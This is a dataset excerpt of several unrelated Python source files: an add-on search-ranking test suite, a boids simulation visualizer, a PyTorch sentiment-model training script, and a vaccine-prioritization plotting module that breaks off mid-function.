text stringlengths 957 885k |
|---|
<reponame>g-k/addons-server<gh_stars>0
# -*- coding: utf-8 -*-
import json
from olympia import amo
from olympia.amo.tests import APITestClient, ESTestCase, reverse_ns
class TestRankingScenarios(ESTestCase):
client_class = APITestClient
def _check_scenario(self, query, expected, no_match=None):
# Make sure things are properly flushed and searchable
url = reverse_ns('addon-search')
response = self.client.get(url, {'q': query})
assert response.status_code == 200
results = json.loads(response.content)['results']
# We only check for greater or equal since we usually don't care
# about what else ElasticSearch finds magically for any query.
# We're mostly concerned about the first few results to check
# our general ranking. In real-world the rest that follows matches
# the general scoring idea.
assert len(results) >= len(expected), (
'Expected {} results but {} found for query "{}": {}'.format(
len(expected), len(results), query,
[x['name']['en-US'] for x in results]
)
)
for idx, name in enumerate(expected):
assert results[idx]['name']['en-US'] == name, (
'Expected "{}" to be on position {} but "{}" is for query {}'
.format(name, idx, results[idx]['name']['en-US'], query)
)
if no_match is not None:
for name in no_match:
names = [item['name']['en-US'] for item in results]
assert name not in names, (
'Expected "{}" not to exist in results for query {}'
.format(name, query)
)
@classmethod
def setUpTestData(cls):
super(TestRankingScenarios, cls).setUpTestData()
# This data was taken from our production add-ons to test
# a few search scenarios. (2018-01-25)
amo.tests.addon_factory(
average_daily_users=18981,
description=None,
name='Tab Center Redux',
slug=u'tab-center-redux',
summary='Move your tabs to the side of your browser window.',
weekly_downloads=915)
amo.tests.addon_factory(
average_daily_users=468126,
description=None,
name='Tab Mix Plus',
slug=u'tab-mix-plus',
summary=(
'Tab Mix Plus enhances Firefox\'s tab browsing capabilities. '
'It includes such features as duplicating tabs, controlling '
'tab focus, tab clicking options, undo closed tabs and '
'windows, plus much more. It also includes a full-featured '
'session manager.'),
weekly_downloads=3985)
amo.tests.addon_factory(
average_daily_users=8838,
description=None,
name='Redux DevTools',
slug=u'remotedev',
summary=(
'DevTools for Redux with actions history, undo and replay.'),
weekly_downloads=1032)
amo.tests.addon_factory(
average_daily_users=482,
description=None,
name='Open Image in New Tab',
slug=u'open-image-new-tab',
summary='Adds a context menu to open images in a new tab.',
weekly_downloads=158)
amo.tests.addon_factory(
average_daily_users=2607,
description=None,
name='Open image in a new tab',
slug=u'open-image-in-a-new-tab',
summary='A context menu to open images in a new tab',
weekly_downloads=329)
amo.tests.addon_factory(
average_daily_users=27832,
description=None,
name='Open Bookmarks in New Tab',
slug=u'open-bookmarks-in-new-tab',
summary=(
'After you installed this addon to your Firefox, bookmarks '
'are opened in new tab always.'),
weekly_downloads=145)
amo.tests.addon_factory(
average_daily_users=528,
description=None,
name='Coinhive Blocker',
slug=u'coinhive-blocker',
summary='Coinhive mining blocker',
weekly_downloads=132)
amo.tests.addon_factory(
average_daily_users=3015,
description=None,
name='CoinBlock',
slug=u'coinblock',
summary=(
'With the rising popularity of coinminers in js form, this '
'extension attempts to block those hosted on coin-hive, and '
'cryptoloot.\nA multiple entry block list is planned.'),
weekly_downloads=658)
amo.tests.addon_factory(
average_daily_users=418,
description=None,
name='NoMiners',
slug=u'nominers',
summary=(
'NoMiners is an Add-on that tries to block cryptominers such '
'as coinhive.\n\nBlocking those pesky miner scripts will '
'relieve your CPU and BATTERY while browsing the web.'
'\n\nIt\'s open source, so feel free to check out the code '
'and submit improvements.'),
weekly_downloads=71)
amo.tests.addon_factory(
average_daily_users=399485,
description=None,
name='Privacy Badger',
slug=u'privacy-badger17',
summary=(
'Protects your privacy by blocking spying ads and invisible '
'trackers.'),
weekly_downloads=22931)
amo.tests.addon_factory(
average_daily_users=8728,
description=None,
name='Privacy Pass',
slug=u'privacy-pass',
summary=(
'Handles passes containing cryptographically blinded tokens '
'for bypassing challenge pages.'),
weekly_downloads=4599)
amo.tests.addon_factory(
average_daily_users=15406,
description=None,
name='Privacy Settings',
slug=u'privacy-settings',
summary=(
'Alter Firefox\'s built-in privacy settings easily with a '
'toolbar panel.'),
weekly_downloads=1492)
amo.tests.addon_factory(
average_daily_users=12857,
description=None,
name='Google Privacy',
slug=u'google-privacy',
summary=(
'Make some popular websites respect your privacy settings.\n'
'Please see the known issues below!'),
weekly_downloads=117)
amo.tests.addon_factory(
average_daily_users=70553,
description=None,
name='Blur',
slug=u'donottrackplus',
summary='Protect your Passwords, Payments, and Privacy.',
weekly_downloads=2224)
amo.tests.addon_factory(
average_daily_users=1009156,
description=None,
name='Ghostery',
slug=u'ghostery',
summary=(
u'See who’s tracking you online and protect your privacy with '
u'Ghostery.'),
weekly_downloads=49315)
amo.tests.addon_factory(
average_daily_users=954288,
description=None,
name='Firebug',
slug=u'firebug',
summary=(
'Firebug integrates with Firefox to put a wealth of '
'development tools at your fingertips while you browse. You '
'can edit, debug, and monitor CSS, HTML, and JavaScript live '
'in any web page...'),
weekly_downloads=21969)
amo.tests.addon_factory(
average_daily_users=10821,
description=None,
name='Firebug Autocompleter',
slug=u'firebug-autocompleter',
summary='Firebug command line autocomplete.',
weekly_downloads=76)
amo.tests.addon_factory(
average_daily_users=11992,
description=None,
name='Firefinder for Firebug',
slug=u'firefinder-for-firebug',
summary=(
'Finds HTML elements matching chosen CSS selector(s) or XPath '
'expression'),
weekly_downloads=358)
amo.tests.addon_factory(
average_daily_users=8200,
description=None,
name='Fire Drag',
slug=u'fire-drag',
summary='drag texts and links with/without e10s',
weekly_downloads=506)
amo.tests.addon_factory(
average_daily_users=61014,
description=None,
name='Menu Wizard',
slug=u's3menu-wizard',
summary=(
'Customizemenus=Helps removing, moving and renaming menus and '
'menu items\nColorize important menu for ease of use! (use '
'Style (CSS))\nChange or disable any of used keyboard '
'shortcutsnSuppor=Firefox, Thunderbird and SeaMonkey'),
weekly_downloads=927)
amo.tests.addon_factory(
average_daily_users=81237,
description=None,
name='Add-ons Manager Context Menu',
slug=u'am-context',
summary='Add more items to Add-ons Manager context menu.',
weekly_downloads=169)
amo.tests.addon_factory(
average_daily_users=51,
description=None,
name='Frame Demolition',
slug=u'frame-demolition',
summary=(
'Enabling route to load abstracted file layer in select '
'sites.'),
weekly_downloads=70)
amo.tests.addon_factory(
average_daily_users=99,
description=None,
name='reStyle',
slug=u're-style',
summary=(
'A user style manager which can load local files and apply UI '
'styles even in Firefox 57+'),
weekly_downloads=70)
amo.tests.addon_factory(
average_daily_users=150,
description=None,
name='MegaUpload DownloadHelper',
slug=u'megaupload-downloadhelper',
summary=(
'Download from MegaUpload.\nMegaUpload Download Helper will '
'start your download once ready.\nMegaUpload Download Helper '
'will monitor time limitations and will auto-start your '
'download.'),
weekly_downloads=77)
amo.tests.addon_factory(
average_daily_users=2830,
description=None,
name='RapidShare DownloadHelper',
slug=u'rapidshare-downloadhelper',
summary=(
'Note from Mozilla: This add-on has been discontinued. Try '
'<a rel="nofollow" href="https://addons.mozilla.org/firefox/'
'addon/rapidshare-helper/">Rapidshare Helper</a> instead.\n\n'
'RapidShare Download Helper will start your download once '
'ready.'),
weekly_downloads=125)
amo.tests.addon_factory(
average_daily_users=98716,
description=None,
name='Popup Blocker',
slug=u'popup_blocker',
summary=(
'Prevents your web browser from opening a new window on top '
'of the content or web site you are viewing. The Addon also '
'supresses unwanted advertisement windows on your screen. '
'The one deciding what consitutes a popup is the user.'),
weekly_downloads=3940)
amo.tests.addon_factory(
average_daily_users=8830,
description=None,
name='No Flash',
slug=u'no-flash',
summary=(
'Replace Youtube, Vimeo and Dailymotion Flash video players '
'embedded on third-party website by the HTML5 counterpart '
'when the content author still use the old style embed '
'(Flash).\n\nSource code at <a rel="nofollow" href="https://'
'outgoing.prod.mozaws.net/v1/14b404a3c05779fa94b24e0bffc0d710'
'6836f1d6b771367b065fb96e9c8656b9/https%3A//github.com/hfigui'
'ere/no-flash">https://github.com/hfiguiere/no-flash</a>'),
weekly_downloads=77)
amo.tests.addon_factory(
average_daily_users=547880,
description=None,
name='Download Flash and Video',
slug=u'download-flash-and-video',
summary=(
'Download Flash and Video is a great download helper tool '
'that lets you download Flash games and Flash videos '
'(YouTube, Facebook, Dailymotion, Google Videos and more) '
'with a single click.\nThe downloader is very easy to use.'),
weekly_downloads=65891)
amo.tests.addon_factory(
average_daily_users=158796,
description=None,
name='YouTube Flash Video Player',
slug=u'youtube-flash-video-player',
summary=(
'YouTube Flash Video Player is a powerful tool that will let '
'you choose Flash video player as default YouTube video '
'player.'),
weekly_downloads=12239)
amo.tests.addon_factory(
average_daily_users=206980,
description=None,
name='YouTube Flash Player',
slug=u'youtube-flash-player',
summary=(
u'A very lightweight add-on that allows you to watch YouTube™ '
u'videos using Flash® Player instead of the '
u'default HTML5 player. The Flash® Player will consume less '
u'CPU and RAM resources if your device doesn\'t easily '
u'support HTML5 videos. Try it!'),
weekly_downloads=21882)
amo.tests.addon_factory(
average_daily_users=5056, description=None,
name='Disable Hello, Pocket & Reader+',
slug=u'disable-hello-pocket-reader',
summary=(
'Turn off Pocket, Reader, Hello and WebRTC bloatware - keep '
'browser fast and clean'),
weekly_downloads=85)
amo.tests.addon_factory(
average_daily_users=26135,
description=None,
name='Reader',
slug=u'reader',
summary='Reader is the ultimate Reader tool for Firefox.',
weekly_downloads=2463)
amo.tests.addon_factory(
average_daily_users=53412,
description=None,
name='Disable WebRTC',
slug=u'happy-bonobo-disable-webrtc',
summary=(
'WebRTC leaks your actual IP addresses from behind your VPN, '
'by default.'),
weekly_downloads=10583)
amo.tests.addon_factory(
average_daily_users=12953,
description=None,
name='In My Pocket',
slug=u'in-my-pocket',
summary=(
'For all those who are missing the old Firefox Pocket addon, '
'and not satisfied with the new Pocket integration, here is '
'an unofficial client for the excellent Pocket service. '
'Hope you\'ll enjoy it!'),
weekly_downloads=1123)
amo.tests.addon_factory(
name='GrApple Yummy')
amo.tests.addon_factory(
name='Delicious Bookmarks')
# Some more or less Dummy data to test a few very specific scenarios
# e.g for exact name matching
amo.tests.addon_factory(
name='Merge Windows', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='Merge All Windows', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='All Downloader Professional', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='test addon test11', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='test addon test21', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='test addon test31', type=amo.ADDON_EXTENSION,
average_daily_users=0, weekly_downloads=0),
amo.tests.addon_factory(
name='1-Click YouTube Video Download',
type=amo.ADDON_EXTENSION,
average_daily_users=566337, weekly_downloads=150000,
description=(
'button, click that button, 1-Click Youtube Video '
'Downloader is a click click great tool')),
amo.tests.addon_factory(
name='Amazon 1-Click Lock', type=amo.ADDON_EXTENSION,
average_daily_users=50, weekly_downloads=0),
cls.refresh()
def test_scenario_tab_center_redux(self):
self._check_scenario('tab center redux', (
'Tab Center Redux',
'Tab Mix Plus',
'Redux DevTools',
))
def test_scenario_open_image_new_tab(self):
# TODO, should not put the "a new tab" thing first :-/
self._check_scenario('Open Image in New Tab', (
'Open image in a new tab',
'Open Image in New Tab',
))
def test_scenario_coinhive(self):
# TODO, should match "CoinBlock"
self._check_scenario('CoinHive', (
'Coinhive Blocker',
'NoMiners', # via description
# 'CoinBlock', # via prefix search
))
def test_scenario_privacy(self):
self._check_scenario('Privacy', (
'Privacy Badger',
'Privacy Settings',
'Google Privacy', # More users, summary
'Privacy Pass',
'Ghostery', # Crazy amount of users, summary
'Blur', # summary + many users but not as many as ghostery
))
def test_scenario_firebu(self):
self._check_scenario('firebu', (
'Firebug',
# unclear why preference to Firebug Autocompleter,
# weekly downloads + users?
'Firefinder for Firebug',
'Firebug Autocompleter',
'Fire Drag',
))
def test_scenario_fireb(self):
self._check_scenario('fireb', (
'Firebug',
'Firefinder for Firebug',
'Firebug Autocompleter',
'Fire Drag',
))
def test_scenario_menu_wizzard(self):
self._check_scenario('Menu Wizzard', (
'Menu Wizard', # (fuzzy, typo)
'Add-ons Manager Context Menu', # partial match + users
))
def test_scenario_frame_demolition(self):
self._check_scenario('Frame Demolition', (
'Frame Demolition',
))
def test_scenario_demolition(self):
# Find "Frame Demolition" via a typo
self._check_scenario('Demolation', (
'Frame Demolition',
))
def test_scenario_restyle(self):
self._check_scenario('reStyle', (
'reStyle',
))
def test_scenario_megaupload_downloadhelper(self):
# Doesn't find "RapidShare DownloadHelper" anymore
# since we now query by "MegaUpload AND DownloadHelper"
self._check_scenario('MegaUpload DownloadHelper', (
'MegaUpload DownloadHelper',
))
def test_scenario_downloadhelper(self):
# No direct match, "Download Flash and Video" has
# huge amount of users that puts it first here
self._check_scenario('DownloadHelper', (
'Download Flash and Video',
'1-Click YouTube Video Download',
'RapidShare DownloadHelper',
'MegaUpload DownloadHelper',
))
def test_scenario_megaupload(self):
self._check_scenario('MegaUpload', (
# TODO: I have litterally NO idea :-/
'Popup Blocker',
'MegaUpload DownloadHelper',
))
def test_scenario_no_flash(self):
# TODO: Doesn't put "No Flash" on first line, does the "No"
# do something special here?
self._check_scenario('No Flash', (
'Download Flash and Video',
'YouTube Flash Player',
'YouTube Flash Video Player',
'No Flash'
))
def test_scenario_disable_hello_pocket_reader_plus(self):
self._check_scenario('Disable Hello, Pocket & Reader+', (
'Disable Hello, Pocket & Reader+', # yeay!
))
def test_scenario_grapple(self):
"""Making sure this scenario works via the API,
see `legacy_api.SearchTest` for various examples.
"""
self._check_scenario('grapple', (
'GrApple Yummy',
))
def test_scenario_delicious(self):
"""Making sure this scenario works via the API,
see `legacy_api.SearchTest` for various examples.
"""
self._check_scenario('delicious', (
'Delicious Bookmarks',
))
def test_score_boost_name_match(self):
# Tests that we match directly "Merge Windows" and also find
# "Merge All Windows" because of slop=1
self._check_scenario('merge windows', (
'Merge Windows',
'Merge All Windows',
), no_match=(
'All Downloader Professional',
))
self._check_scenario('merge all windows', (
'Merge All Windows',
'Merge Windows',
'All Downloader Professional',
))
def test_score_boost_exact_match(self):
"""Test that we rank exact matches at the top."""
self._check_scenario('test addon test21', (
'test addon test21',
))
def test_score_boost_exact_match_description_hijack(self):
"""Test that we rank exact matches at the top."""
self._check_scenario('Amazon 1-Click Lock', (
'Amazon 1-Click Lock',
'1-Click YouTube Video Download',
))
|
<reponame>zwrankin/vivarium_examples<filename>src/vivarium_examples/boids/visualization.py
import matplotlib.pyplot as plt
from matplotlib import animation
import os
import shutil
import imageio
def plot_birds(simulation, plot_velocity=False):
width = simulation.configuration.location.width
height = simulation.configuration.location.height
pop = simulation.population.population
plt.figure(figsize=[12, 12])
plt.scatter(pop.x, pop.y, color=pop.color)
if plot_velocity:
plt.quiver(pop.x, pop.y, pop.vx, pop.vy, color=pop.color, width=0.002)
plt.xlabel('x')
plt.ylabel('y')
plt.axis([0, width, 0, height])
plt.show()
color_map = {0: 'black', 1: 'red', 2: 'blue', 3: 'yellow', 4: 'green', 5: 'brown', 6: 'gray', 7: 'orange'}
class SaveFrames:
"""
Save one frame per step, that is assembled into GIF at simulation_end
NOTE - it seems that the simulation_end event doesn't fire during interactive runs, in which case
you must manually knit after simulation
This component is a hacky way to get around the bugs I'm having with MovieWriter (e.g. it doesn't work on Windows)
:param fname: repo within which frames and gif will be saved (e.g. 'test' will save '/output/test/movie.gif')
:param plot_type: whether to plot color as cluster or infection
"""
def __init__(self, fname='test', plot_type='infection'):
self.fname = fname
self.plot_type = plot_type
self.step = 1
self.path = f'output/{self.fname}'
if not os.path.exists('output'):
os.mkdir('output')
shutil.rmtree(self.path, ignore_errors=True)
os.mkdir(self.path)
def setup(self, builder):
self.width = builder.configuration.location.width
self.height = builder.configuration.location.height
builder.event.register_listener('time_step',
self.on_time_step) # priority??? Before or after they actually move?
builder.event.register_listener('simulation_end', self.save_movie)
cols = ['x', 'y', 'vx', 'vy']
if self.plot_type == 'cluster':
cols.append('cluster')
elif self.plot_type == 'infection':
cols.append('infected')
self.population_view = builder.population.get_view(cols)
def on_time_step(self, event):
pop = self.population_view.get(event.index)
if self.plot_type == 'cluster':
pop['color'] = pop.cluster.map(color_map)
elif self.plot_type == 'infection':
pop['color'] = pop.infected.map(color_map)
else:
raise AssertionError(f'{self.plot_type} not recognized')
plt.clf()
self.plot_boids(pop)
plt.savefig(f'{self.path}/step_{self.step}.png')
self.step += 1
def plot_boids(self, pop):
plt.figure(figsize=[12, 12])
plt.scatter(pop.x, pop.y, color=pop.color)
plt.quiver(pop.x, pop.y, pop.vx, pop.vy, color=pop.color, width=0.002)
plt.xlabel('x')
plt.ylabel('y')
plt.axis([0, self.width, 0, self.height])
def save_movie(self, event):
# NOTE - 'simulation_end' event doesn't seem to fire in interactive mode
# Here's a hack to turn frames into gif after sim
# import imageio
# image_directory = 'images/test'
# images = [i for i in os.listdir(image_directory) if 'png' in i]
# images = [f'step_{i}.png' for i in range(1, len(images) + 1)]
# with imageio.get_writer(f'{image_directory}/movie.gif', mode='I', fps=2) as writer:
# for i in images:
# image = imageio.imread(f'{image_directory}/{i}', format='png')
# writer.append_data(image)
images = [f'step_{i}.png' for i in range(1, self.step)] # Note that self.step is 1 greater than number of steps
with imageio.get_writer(f'{self.path}/movie.gif', mode='I', fps=2) as writer:
for i in images:
image = imageio.imread(f'{self.path}/{i}', format='png')
writer.append_data(image)
class MovieWriter:
"""
DOESN'T WORK!
Saves a gif of simulation
Something about animation's subprocess backend doesn't seem to work on Windows
Getting a different bug on cluster, haven't debugged yet
"""
def __init__(self, fname, plot_type='infection'):
self.moviewriter = animation.ImageMagickWriter(fps=2)
self.fname = f'output/{fname}'
self.plot_type = plot_type
if not os.path.exists('output'):
os.mkdir('output')
def __enter__(self):
fig = plt.figure()
self.moviewriter.setup(fig, self.fname, dpi=100)
return self
def setup(self, builder):
self.width = builder.configuration.location.width
self.height = builder.configuration.location.height
builder.event.register_listener('time_step', self.on_time_step)
cols = ['x', 'y', 'vx', 'vy']
if self.plot_type == 'cluster':
cols.append('cluster')
elif self.plot_type == 'infection':
cols.append('infected')
self.population_view = builder.population.get_view(cols)
def on_time_step(self, event):
pop = self.population_view.get(event.index)
if self.plot_type == 'cluster':
pop['color'] = pop.cluster.map(color_map)
elif self.plot_type == 'infection':
pop['color'] = pop.infected.map(color_map)
else:
raise AssertionError(f'{self.plot_type} not recognized')
plt.clf()
self.plot_boids(pop)
self.moviewriter.grab_frame()
def plot_boids(self, pop):
plt.figure(figsize=[12, 12])
plt.scatter(pop.x, pop.y, color=pop.color)
plt.quiver(pop.x, pop.y, pop.vx, pop.vy, color=pop.color, width=0.002)
plt.xlabel('x')
plt.ylabel('y')
plt.axis([0, self.width, 0, self.height])
def __exit__(self, exception_type, exception_value, traceback):
self.moviewriter.finish()
|
import os
import argparse
import numpy as np
import torch
from torch.utils.data import DataLoader
from model import get_rnn_model, DNN
from util import *
from manager import Manager
torch.manual_seed(1004)
parser = argparse.ArgumentParser()
parser.add_argument('mode', choices= ['train', 'predict', 'ensemble', 'bow'])
parser.add_argument('config', help= 'Symbol of model configuration', default= 'simple')
parser.add_argument('-train_x', help= 'Path to train_x.csv', default= '../../data_hw6/train_x.csv')
parser.add_argument('-train_y', help= 'Path to train_y.csv', default= '../../data_hw6/train_y.csv')
parser.add_argument('-test_x', help= 'Path to test_x.csv', default= '../../data_hw6/test_x.csv')
parser.add_argument('-dict', help= 'Path to dictionary', default= '../../data_hw6/dict.txt.big')
parser.add_argument('-word_model', help= 'Path to Word model', default= '../../data_hw6/word2vec_2.model')
parser.add_argument('-lr', help= 'learnig rate', type= float, default= 1e-3)
parser.add_argument('-epoch', help= 'Epoch number', type= int, default= 7)
parser.add_argument('-batch_size', type= int, default= 32)
parser.add_argument('-seq_len', type= int, help= 'Sequence length for each data', default= 40)
parser.add_argument('-save', help= 'Path to save model')
parser.add_argument('-load', help= 'Path to load model')
parser.add_argument('-record', help= 'Path to file for recording result')
parser.add_argument('-predict', help= 'Path to prediction file')
args = parser.parse_args()
if __name__ == '__main__':
model = get_rnn_model(args.config, args.batch_size)
if args.mode == 'train':
print('= Training =')
train_words = WordsData(mode= 'train', x_path= args.train_x, y_path= args.train_y,
model_path= args.word_model, dict_path= args.dict, seq_len= args.seq_len)
valid_words = WordsData(mode= 'valid', x_path= args.train_x, y_path= args.train_y,
model_path= args.word_model, dict_path= args.dict, seq_len= args.seq_len)
train_data = DataLoader(train_words, batch_size= args.batch_size, shuffle= True)
valid_data = DataLoader(valid_words, batch_size= args.batch_size, shuffle= False)
model_manager = Manager(model, args)
model_manager.train(train_data, valid_data)
elif args.mode == 'predict':
print('= Predicting =')
test_words = WordsData(mode= 'test', x_path= args.test_x, y_path= None,
model_path= args.word_model, dict_path= args.dict, seq_len= args.seq_len)
test_data = DataLoader(test_words, batch_size= args.batch_size, shuffle= False)
model_manager = Manager(model, args)
model_manager.predict(test_data, args.predict)
elif args.mode == 'ensemble':
test_num = 20000
seq_len_list = [40, 50, 60, 80, 100]
weight_dir = '../../weights/'
model_weight_pair = {
'simple': '0508_1.pkl',
# 'A': '0508_2.pkl',
'B': '0508_3.pkl',
'C': '0508_4.pkl'
}
scores = np.zeros((test_num,))
threshold = len(seq_len_list) * len(model_weight_pair) / 2
for m_name, w_name in model_weight_pair.items():
model = get_rnn_model(m_name, args.batch_size)
#args.load = os.path.join(weight_dir, w_name)
args.load = w_name
model_manager = Manager(model, args)
for seq_len in seq_len_list:
test_words = WordsData(mode= 'test', x_path= args.test_x, y_path= None,
model_path= args.word_model, dict_path= args.dict, seq_len= seq_len)
test_data = DataLoader(test_words, batch_size= args.batch_size, shuffle= False)
scores += model_manager.get_all_predictions(test_data)
file = open(args.predict, 'w')
file.write('id,label\n')
for i, score in enumerate(scores):
pred = 1 if score > threshold else 0
file.write('{},{}\n'.format(i, pred))
elif args.mode == 'bow':
model = DNN()
train_words = BOW(mode= 'train', x_path= args.train_x, y_path= args.train_y)
valid_words = BOW(mode= 'valid', x_path= args.train_x, y_path= args.train_y)
train_data = DataLoader(train_words, batch_size= args.batch_size, shuffle= True)
valid_data = DataLoader(valid_words, batch_size= args.batch_size, shuffle= False)
manager = Manager(model, args)
manager.train(train_data, valid_data)
|
<reponame>COVID-IWG/epimargin-studies
from itertools import chain, product
from functools import lru_cache
import epimargin.plots as plt
from studies.age_structure.TN_CMIE.commons import *
from studies.age_structure.TN_CMIE.epi_simulations import *
# data loading
N_jk_dicts = districts_to_run.filter(like = "N_", axis = 1).to_dict()
N_TN = districts_to_run.N_tot.sum()
def parse_tag(tag):
return tuple(int(_) if _.isnumeric() else _ for _ in tag.split("_", 1))
def load_metrics(filename):
npz = np.load(filename)
return {parse_tag(tag): npz[tag] for tag in npz.files}
def map_pop_dict(agebin, district):
i = age_bin_labels.index(agebin)
return N_jk_dicts[f"N_{i}"][district]
def export_WB():
TN_pop_df = districts_to_run.filter(regex = "N_[0-6]", axis = 1)
age_dist_wtp = {k1: v * USD/TN_pop_df.loc[k1].values for ((k1, k2, k3), v) in per_district_WTP_percentiles.items() if (k2, k3) == (50, "random")}
age_dist_wtp_flat = list(chain([k, op, *v[i]] for (i, op) in enumerate(["median", "lo", "hi"]) for (k, v) in age_dist_wtp.items()))
pd.DataFrame(age_dist_wtp_flat).rename(columns = dict(enumerate(["district", "metric"] + age_bin_labels)))
# calculations
def get_wtp_ranking(district_WTP):
@lru_cache
def ranking(phi, vax_policy = "random"):
all_wtp = pd.concat([
pd.DataFrame(np.median(v, axis = 1))\
.assign(district = district)\
.reset_index()\
.rename(columns = {"index": "t"})\
.rename(columns = dict(enumerate(age_bin_labels)))\
.set_index(["t", "district"])
for ((district, tag), v) in district_WTP.items()
if tag == f"{phi}_{vax_policy}"
], axis = 0)\
.stack()\
.reset_index()\
.rename(columns = {"level_2": "agebin", 0: "agg_wtp"})
all_wtp["_t"] = -all_wtp["t"]
all_wtp["pop"] = [map_pop_dict(b, d) for (b, d) in all_wtp[["agebin", "district"]].itertuples(index = False)]
all_wtp["wtp_pc"] = all_wtp["agg_wtp"]/all_wtp["pop"]
all_wtp["wtp_pc_usd"] = all_wtp["wtp_pc"] * USD
all_wtp.sort_values(["_t", "wtp_pc_usd"], ascending = False, inplace = True)
all_wtp.drop(columns = ["_t"], inplace = True)
all_wtp.set_index("t", inplace = True)
all_wtp["num_vax"] = all_wtp["pop"].groupby(level = 0).cumsum()
return all_wtp
return ranking
# plotting functions
def outcomes_per_policy(percentiles, metric_label, fmt,
phis = [25, 50, 100, 200],
reference = (25, "no_vax"),
reference_color = no_vax_color,
vax_policies = ["contact", "random", "mortality"],
policy_colors = [contactrate_vax_color, random_vax_color, mortality_vax_color],
policy_labels = ["contact rate priority", "random assignment", "mortality priority"],
spacing = 0.2):
fig = plt.figure()
md, lo, hi = percentiles[reference]
*_, bars = plt.errorbar(x = [0], y = [md], yerr = [[md - lo], [hi - md]], figure = fig,
fmt = fmt, color = reference_color, label = "no vaccination", ms = 12, elinewidth = 5)
[_.set_alpha(0.5) for _ in bars]
plt.hlines(md, xmin = -1, xmax = 5, linestyles = "dotted", colors = reference_color)
for (i, phi) in enumerate(phis, start = 1):
for (j, (vax_policy, color, label)) in enumerate(zip(vax_policies, policy_colors, policy_labels)):
md, lo, hi = death_percentiles[phi, vax_policy]
*_, bars = plt.errorbar(
x = [i + spacing * (j - 1)],
y = [md], yerr = [[md - lo], [hi - md]],
figure = fig,
fmt = fmt,
color = color,
label = label if i == 0 else None,
ms = 12, elinewidth = 5
)
[_.set_alpha(0.5) for _ in bars]
plt.legend(ncol = 4, fontsize = "20", loc = "lower center", bbox_to_anchor = (0.5, 1))
plt.xticks(range(len(phis) + 1), [f"$\phi = {phi}$%" for phi in ([0] + phis)], fontsize = "20")
plt.yticks(fontsize = "20")
plt.PlotDevice().ylabel(f"{metric_label}\n")
plt.gca().grid(False, axis = "x")
ymin, ymax = plt.ylim()
plt.vlines(x = [0.5 + _ for _ in range(len(phis))], ymin = ymin, ymax = ymax, color = "gray", alpha = 0.5, linewidths = 2)
plt.ylim(ymin, ymax)
plt.xlim(-0.5, len(phis) + 1.5)
def plot_component_breakdowns(color, white, colorlabel, whitelabel, semilogy = False, ylabel = "WTP (USD)"):
fig, ax = plt.subplots()
ax.bar(range(7), white * USD, bottom = color * USD, color = "white", edgecolor = age_group_colors, linewidth = 2, figure = fig)
ax.bar(range(7), color * USD, color = age_group_colors, edgecolor = age_group_colors, linewidth = 2, figure = fig)
ax.bar(range(7), [0], label = whitelabel, color = "white", edgecolor = "black", linewidth = 2)
ax.bar(range(7), [0], label = colorlabel, color = "black", edgecolor = "black", linewidth = 2)
plt.xticks(range(7), age_bin_labels, fontsize = "20")
plt.yticks(fontsize = "20")
plt.legend(ncol = 4, fontsize = "20", loc = "lower center", bbox_to_anchor = (0.5, 1))
plt.PlotDevice().ylabel(f"{ylabel}\n")
if semilogy: plt.semilogy()
def plot_district_age_distribution(percentiles, ylabel, fmt, phi = 50, vax_policy = "random", N_jk = None, n = 5, district_spacing = 1.5, age_spacing = 0.1, rotation = 0):
fig = plt.figure()
district_ordering = list(districts_to_run.index)[:n]
for (i, district) in enumerate(district_ordering):
ylls = percentiles[district, phi, vax_policy]
for j in range(7):
plt.errorbar(
x = [district_spacing * i + age_spacing * (j - 3)],
y = ylls[1, 6-j] * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1),
yerr = [
[(ylls[1, 6-j] - ylls[0, 6-j]) * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1)],
[(ylls[2, 6-j] - ylls[1, 6-j]) * USD/(N_jk[f"N_{6-j}"][district] if N_jk else 1)]
],
fmt = fmt,
color = age_group_colors[6-j],
figure = fig,
label = None if i > 0 else age_bin_labels[6-j],
ms = 12, elinewidth = 5
)
plt.xticks(
[1.5 * _ for _ in range(n)],
district_ordering,
rotation = rotation,
fontsize = "20"
)
plt.yticks(fontsize = "20")
plt.legend(title = "age bin", title_fontsize = "20", fontsize = "20", ncol = 7,
loc = "lower center", bbox_to_anchor = (0.5, 1))
ymin, ymax = plt.ylim()
plt.vlines(x = [0.75 + 1.5 * _ for _ in range(n-1)], ymin = ymin, ymax = ymax, color = "gray", alpha = 0.5, linewidths = 2)
plt.ylim(ymin, ymax)
plt.gca().grid(False, axis = "x")
plt.PlotDevice().title(f"\n{vax_policy} demand curves").ylabel(f"{ylabel}\n")
def demand_curves(ranking_provider, vax_policy, phis = [25, 50, 100, 200], phi_benchmark = 25, N_state = N_TN):
wtp_rankings = {phi: ranking_provider(phi, vax_policy) for phi in phis}
figure = plt.figure()
lines = []
# benchmark
benchmark = wtp_rankings[phi_benchmark]
x_pop = list(chain(*zip(benchmark.loc[0]["num_vax"].shift(1).fillna(0), benchmark.loc[0]["num_vax"])))
y_wtp = list(chain(*zip(benchmark.loc[0]["wtp_pc_usd"], benchmark.loc[0]["wtp_pc_usd"])))
lines.append(plt.plot(x_pop, y_wtp, figure = figure, color = "black", linewidth = 2)[0])
lines.append(plt.plot(0, 0, color = "white")[0])
# plot dynamic curve
for (phi, all_wtp) in wtp_rankings.items():
daily_doses = phi * percent * annually * N_state
distributed_doses = 0
x_pop = []
y_wtp = []
t_vax = []
ranking = 0
for t in range(simulation_range):
wtp = all_wtp.loc[t].reset_index()
ranking = wtp[(wtp.index >= ranking) & (wtp.num_vax > distributed_doses)].index.min()
if np.isnan(ranking):
break
x_pop += [distributed_doses, distributed_doses + daily_doses]
t_vax += [t, t+1]
y_wtp += [wtp.iloc[ranking].wtp_pc_usd]*2
distributed_doses += daily_doses
lines.append(
plt.plot(x_pop, y_wtp, label = f"dynamic, {vax_policy}, $\phi = ${phi}%", figure = figure)[0]
)
plt.legend(
lines,
